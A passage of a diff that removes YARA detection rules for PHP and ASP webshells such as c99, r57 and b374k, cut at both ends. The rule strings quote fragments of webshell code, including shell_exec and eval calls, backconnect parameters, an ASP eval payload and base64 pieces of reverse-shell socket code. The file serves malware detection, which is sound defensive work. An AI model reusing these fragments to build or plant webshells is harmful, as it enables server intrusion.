-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
-		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
-	condition:
-		1 of them
-}
-rule _w_php_php_wacking_php_php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
-		$s2 = "c99sh_sqlquery"
-	condition:
-		1 of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
-		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
-	condition:
-		1 of them
-}
-rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash4 = "817671e1bdc85e04cc3440bbd9288800"
-	strings:
-		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
-		$s1 = ".$arrow.\"</b>\",in('text','"
-	condition:
-		2 of them
-}
-rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-	strings:
-		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
-		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
-		$s2 = "rst.void.ru" 
-	condition:
-		3 of them
-}
-rule _r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "8023394542cddf8aee5dec6072ed02b5"
-		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash3 = "817671e1bdc85e04cc3440bbd9288800"
-	strings:
-		$s0 = "echo ws(2).$lb.\" <a"
-		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
-		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
-	condition:
-		2 of them
-}
-rule _wacking_php_php_1_SpecialShell_99_php_php_c100_php {
-	meta:
-		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash2 = "09609851caa129e40b0d56e90dfc476c"
-		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
-	strings:
-		$s0 = "if(eregi(\"./shbd $por\",$scan))"
-		$s1 = "$_POST['backconnectip']"
-		$s2 = "$_POST['backcconnmsg']" 
-	condition:
-		1 of them
-}
-rule _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash2 = "8023394542cddf8aee5dec6072ed02b5"
-		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash4 = "817671e1bdc85e04cc3440bbd9288800"
-	strings:
-		$s1 = "if(rmdir($_POST['mk_name']))"
-		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
-		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
-	condition:
-		2 of them
-}
-rule _w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash3 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
-		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
-		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
-	condition:
-		1 of them
-}
-rule _webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php {
-	meta:
-		description = "Semi-Auto-generated  - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7"
-		hash1 = "12911b73bc6a5d313b494102abcf5c57"
-		hash2 = "13f5c7a035ecce5f9f380967cf9d4e92"
-	strings:
-		$s0 = "return $type . $owner . $group . $other;" fullword
-		$s1 = "$owner  = ($mode & 00400) ? 'r' : '-';" fullword
-	condition:
-		all of them
-}
-rule multiple_php_webshells {
-	meta:
-		description = "Semi-Auto-generated  - from files multiple_php_webshells"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "be0f67f3e995517d18859ed57b4b4389"
-		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash4 = "8023394542cddf8aee5dec6072ed02b5"
-		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash6 = "817671e1bdc85e04cc3440bbd9288800"
-		hash7 = "7101fe72421402029e2629f3aaed6de7"
-		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
-	strings:
-		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
-		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
-		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
-	condition:
-		2 of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-	strings:
-		$s0 = "<b>Dumped! Dump has been writed to "
-		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
-		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
-	condition:
-		1 of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-	strings:
-		$s0 = "@ini_set(\"highlight" fullword
-		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
-		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
-	condition:
-		2 of them
-}
-rule _GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "be0f67f3e995517d18859ed57b4b4389"
-		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
-		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
-	strings:
-		$s2 = "echo $uname.\"</font><br><b>\";" fullword
-		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
-		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
-	condition:
-		2 of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = "c99ftpbrutecheck"
-		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
-		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
-		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
-	condition:
-		2 of them
-}
-rule _w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = "$sqlquicklaunch[] = array(\""
-		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
-	condition:
-		all of them
-}
-rule _antichat_php_php_Fatalshell_php_php_a_gedit_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
-		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
-		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
-	strings:
-		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
-		$s1 = "if($action==\"phpeval\"){" fullword
-		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
-		$s3 = "$dir=getcwd().\"/\";" fullword
-	condition:
-		2 of them
-}
-rule _c99shell_v1_0_php_php_c99php_SsEs_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-	strings:
-		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
-	condition:
-		1 of them
-}
-rule _Crystal_php_nshell_php_php_load_shell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
-		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
-		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
-	strings:
-		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
-		$s1 = "$dires = $dires . $directory;" fullword
-		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
-	condition:
-		2 of them
-}
-rule _nst_php_php_cybershell_php_php_img_php_php_nstview_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
-		hash1 = "ef8828e0bc0641a655de3932199c0527"
-		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
-		hash3 = "4745d510fed4378e4b1730f56f25e569"
-	strings:
-		$s0 = "@$rto=$_POST['rto'];" fullword
-		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
-		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
-	condition:
-		2 of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "433706fdc539238803fd47c4394b5109"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
-		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
-	condition:
-		all of them
-}
-rule _c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php {
-	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash3 = "d089e7168373a0634e1ac18c0ee00085"
-		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
-	strings:
-		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
-	condition:
-		all of them
-}
-rule multiple_php_webshells_2 {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash6 = "09609851caa129e40b0d56e90dfc476c"
-		hash7 = "671cad517edd254352fe7e0c7c981c39"
-	strings:
-		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
-		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
-		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
-	condition:
-		all of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
-		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
-		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
-		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
-	condition:
-		2 of them
-}
-rule _r577_php_php_r57_php_php_spy_php_php_s_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash3 = "817671e1bdc85e04cc3440bbd9288800"
-	strings:
-		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
-		$s2 = "'eng_text30'=>'Cat file'," fullword
-		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
-	condition:
-		1 of them
-}
-rule _nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php {
-	meta:
-		description = "Semi-Auto-generated  - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
-		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash3 = "f3ca29b7999643507081caab926e2e74"
-	strings:
-		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
-		$s1 = "$ret = posix_kill($pid,$sig);" fullword
-		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
-		$s3 = "$i = $nixpasswd;" fullword
-	condition:
-		2 of them
-}
-
-/* GIF Header webshell */
-
-rule DarkSecurityTeam_Webshell {
-	meta:
-		description = "Dark Security Team Webshell"
-		author = "Florian Roth"
-		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
-		score = 50
-	strings:
-		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
-	condition:
-		1 of them
-}
-
-rule GIFCloaked_Webshell {
-	meta:
-		description = "Looks like a webshell cloaked as GIF"
-		author = "Florian Roth"
-		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
-		score = 50
-	strings:
-		$magic = { 47 49 46 38 } /* GIF8 ... */
-		$s0 = "input type"		
-		$s1 = "<%eval request"
-		$s2 = "<%eval(Request.Item["
-		$s3 = "LANGUAGE='VBScript'"
-	condition:
-		( $magic at 0 ) and ( 1 of ($s*) )
-}
-
-rule PHP_Cloaked_Webshell_SuperFetchExec {
-	meta:
-		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
-		reference = "http://goo.gl/xFvioC"
-		author = "Florian Roth"
-		score = 50
-	strings:
-		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"		
-	condition:
-		$s0
-}
-
-/* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */
-
-rule WebShell_RemExp_asp_php {
-	meta:
-		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
-		author = "Florian Roth"
-		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
-	strings:
-		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
-		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
-		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
-		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
-		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
-	condition:
-		all of them
-}
-rule WebShell_dC3_Security_Crew_Shell_PRiV {
-	meta:
-		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
-		author = "Florian Roth"
-		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
-	strings:
-		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
-		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
-		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
-		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
-		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
-		$s20 = "if (isset($_GET['rename_all'])) {" fullword
-	condition:
-		3 of them
-}
-rule WebShell_simattacker {
-	meta:
-		description = "PHP Webshells Github Archive - file simattacker.php"
-		author = "Florian Roth"
-		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
-	strings:
-		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
-		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
-		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
-		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
-		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
-		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
-		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
-		$s20 = "$Comments=$_POST['Comments'];" fullword
-	condition:
-		2 of them
-}
-rule WebShell_DTool_Pro {
-	meta:
-		description = "PHP Webshells Github Archive - file DTool Pro.php"
-		author = "Florian Roth"
-		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
-	strings:
-		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
-		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
-		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
-		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
-		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
-		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
-		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
-		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
-	condition:
-		3 of them
-}
-rule WebShell_ironshell {
-	meta:
-		description = "PHP Webshells Github Archive - file ironshell.php"
-		author = "Florian Roth"
-		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
-	strings:
-		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
-		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
-		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
-		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
-		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
-		$s16 = "if($_POST['chars'] == \"9999\")" fullword
-		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
-		$s18 = "print shell_exec($command);" fullword
-	condition:
-		3 of them
-}
-rule WebShell_indexer_asp_php {
-	meta:
-		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
-		author = "Florian Roth"
-		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
-	strings:
-		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
-		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
-		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
-		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
-		$s7 = "var message=\"SaNaLTeRoR - " fullword
-		$s8 = "nDexEr - Reader\"" fullword
-	condition:
-		3 of them
-}
-rule WebShell_toolaspshell {
-	meta:
-		description = "PHP Webshells Github Archive - file toolaspshell.php"
-		author = "Florian Roth"
-		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
-	strings:
-		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
-		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
-		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
-	condition:
-		2 of them
-}
-rule WebShell_b374k_mini_shell_php_php {
-	meta:
-		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
-		author = "Florian Roth"
-		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
-	strings:
-		$s0 = "@error_reporting(0);" fullword
-		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
-		$s3 = "@set_time_limit(0); " fullword
-	condition:
-		all of them
-}
-rule WebShell_Sincap_1_0 {
-	meta:
-		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
-		author = "Florian Roth"
-		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
-	strings:
-		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
-		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
-		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
